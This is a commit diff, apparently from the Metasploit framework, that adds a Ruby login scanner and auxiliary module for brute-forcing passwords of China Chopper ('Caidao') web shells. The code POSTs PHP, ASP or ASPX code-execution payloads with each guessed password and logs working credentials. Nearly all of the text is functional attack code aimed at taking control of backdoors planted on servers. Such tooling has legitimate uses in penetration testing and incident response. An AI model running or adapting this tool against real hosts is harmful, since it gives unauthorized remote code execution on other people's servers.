chinese caidao asp/aspx/php backdoor bruteforce
nixawk
parent
d1ceda39e9
commit
370351ca88
|
|
@ -0,0 +1,84 @@
|
|||
require 'metasploit/framework/login_scanner/http'
|
||||
|
||||
module Metasploit
|
||||
module Framework
|
||||
module LoginScanner
|
||||
|
||||
# Chinese Caidao login scanner
|
||||
class Caidao < HTTP
|
||||
# Inherit LIKELY_PORTS, LIKELY_SERVICE_NAMES, and REALM_KEY from HTTP
|
||||
DEFAULT_PORT = 80
|
||||
PRIVATE_TYPES = [ :password ]
|
||||
|
||||
def set_sane_defaults
|
||||
self.method = "POST" if self.method.nil?
|
||||
end
|
||||
|
||||
def attempt_login(credential)
|
||||
result_opts = {
|
||||
credential: credential,
|
||||
host: host,
|
||||
port: port,
|
||||
protocol: 'tcp'
|
||||
}
|
||||
|
||||
if ssl
|
||||
result_opts[:service_name] = 'https'
|
||||
else
|
||||
result_opts[:service_name] = 'http'
|
||||
end
|
||||
|
||||
begin
|
||||
status = try_login(credential)
|
||||
result_opts.merge!(status)
|
||||
rescue ::EOFError, Errno::ETIMEDOUT, Errno::ECONNRESET, Rex::ConnectionError, OpenSSL::SSL::SSLError, ::Timeout::Error => e
|
||||
result_opts.merge!(status: Metasploit::Model::Login::Status::UNABLE_TO_CONNECT, proof: e)
|
||||
end
|
||||
Result.new(result_opts)
|
||||
end
|
||||
|
||||
def try_login(credential)
|
||||
cli = Rex::Proto::Http::Client.new(host, port, { 'Msf' => framework, 'MsfExploit' => framework_module }, ssl, ssl_version, proxies)
|
||||
configure_http_client(cli)
|
||||
cli.connect
|
||||
flag = Rex::Text.rand_text_alphanumeric(4)
|
||||
lmark = Rex::Text.rand_text_alphanumeric(4)
|
||||
rmark = Rex::Text.rand_text_alphanumeric(4)
|
||||
|
||||
case self.uri
|
||||
when /php$/mi
|
||||
payload = "$_=\"#{flag}\";echo \"#{lmark}\".$_.\"#{rmark}\";"
|
||||
when /asp$/mi
|
||||
payload = 'execute("response.write(""'
|
||||
payload << "#{lmark}"
|
||||
payload << '""):response.write(""'
|
||||
payload << "#{flag}"
|
||||
payload << '""):response.write(""'
|
||||
payload << "#{rmark}"
|
||||
payload << '""):response.end")'
|
||||
when /aspx$/mi
|
||||
payload = "Response.Write(\"#{lmark}\");"
|
||||
payload << "Response.Write(\"#{flag}\");"
|
||||
payload << "Response.Write(\"#{rmark}\")"
|
||||
else
|
||||
print_error("Backdoor type is not support")
|
||||
return
|
||||
end
|
||||
|
||||
req = cli.request_cgi({
|
||||
'method' => method,
|
||||
'uri' => uri,
|
||||
'data' => "#{credential.private}=#{payload}"
|
||||
})
|
||||
res = cli.send_recv(req)
|
||||
|
||||
if res && res.code == 200 && res.body.to_s.include?("#{lmark}#{flag}#{rmark}")
|
||||
return { :status => Metasploit::Model::Login::Status::SUCCESSFUL, :proof => res.body }
|
||||
end
|
||||
|
||||
{ :status => Metasploit::Model::Login::Status::INCORRECT, :proof => res.body }
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
|
|
@ -0,0 +1,82 @@
|
|||
##
|
||||
# This module requires Metasploit: http://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
require 'metasploit/framework/credential_collection'
|
||||
require 'metasploit/framework/login_scanner/caidao'
|
||||
|
||||
class Metasploit4 < Msf::Auxiliary
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
include Msf::Auxiliary::Scanner
|
||||
include Msf::Auxiliary::Report
|
||||
include Msf::Auxiliary::AuthBrute
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Chinese Caidao Backdoor Bruteorce',
|
||||
'Description' => 'This module attempts to brute chinese caidao asp/php/aspx backdoor.',
|
||||
'Author' => [ 'Nixawk' ],
|
||||
'References' => [
|
||||
['URL', 'https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html'],
|
||||
['URL', 'https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-ii.html'],
|
||||
['URL', 'https://www.exploit-db.com/docs/27654.pdf'],
|
||||
['URL', 'https://www.us-cert.gov/ncas/alerts/TA15-313A'],
|
||||
['URL', 'http://blog.csdn.net/nixawk/article/details/40430329']
|
||||
],
|
||||
'License' => MSF_LICENSE
|
||||
))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('LOGIN_URL', [true, 'The URL that handles the login process', '/caidao.php']),
|
||||
OptPath.new('PASS_FILE', [
|
||||
false,
|
||||
'The file that contains a list of of probable passwords.',
|
||||
File.join(Msf::Config.install_root, 'data', 'wordlists', 'unix_passwords.txt')
|
||||
])
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def run_host(ip)
|
||||
cred_collection = Metasploit::Framework::CredentialCollection.new(
|
||||
blank_passwords: datastore['BLANK_PASSWORDS'],
|
||||
pass_file: datastore['PASS_FILE'],
|
||||
password: datastore['PASSWORD'],
|
||||
user_file: datastore['USER_FILE'],
|
||||
userpass_file: datastore['USERPASS_FILE'],
|
||||
username: datastore['USERNAME'],
|
||||
user_as_pass: datastore['USER_AS_PASS']
|
||||
)
|
||||
|
||||
scanner = Metasploit::Framework::LoginScanner::Caidao.new(
|
||||
configure_http_login_scanner(
|
||||
uri: datastore['LOGIN_URL'],
|
||||
method: datastore['HTTP_METHOD'],
|
||||
cred_details: cred_collection,
|
||||
stop_on_success: datastore['STOP_ON_SUCCESS'],
|
||||
bruteforce_speed: datastore['BRUTEFORCE_SPEED'],
|
||||
connection_timeout: 10
|
||||
)
|
||||
)
|
||||
|
||||
scanner.scan! do |result|
|
||||
credential_data = result.to_h
|
||||
credential_data.merge!(
|
||||
module_fullname: fullname,
|
||||
workspace_id: myworkspace_id
|
||||
)
|
||||
if result.success?
|
||||
credential_core = create_credential(credential_data)
|
||||
credential_data[:core] = credential_core
|
||||
create_credential_login(credential_data)
|
||||
|
||||
print_good "#{ip}:#{rport} - LOGIN SUCCESSFUL: #{result.credential}"
|
||||
else
|
||||
invalidate_login(credential_data)
|
||||
vprint_error "#{ip}:#{rport} - LOGIN FAILED: #{result.credential} (#{result.status})"
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
Loading…
Reference in New Issue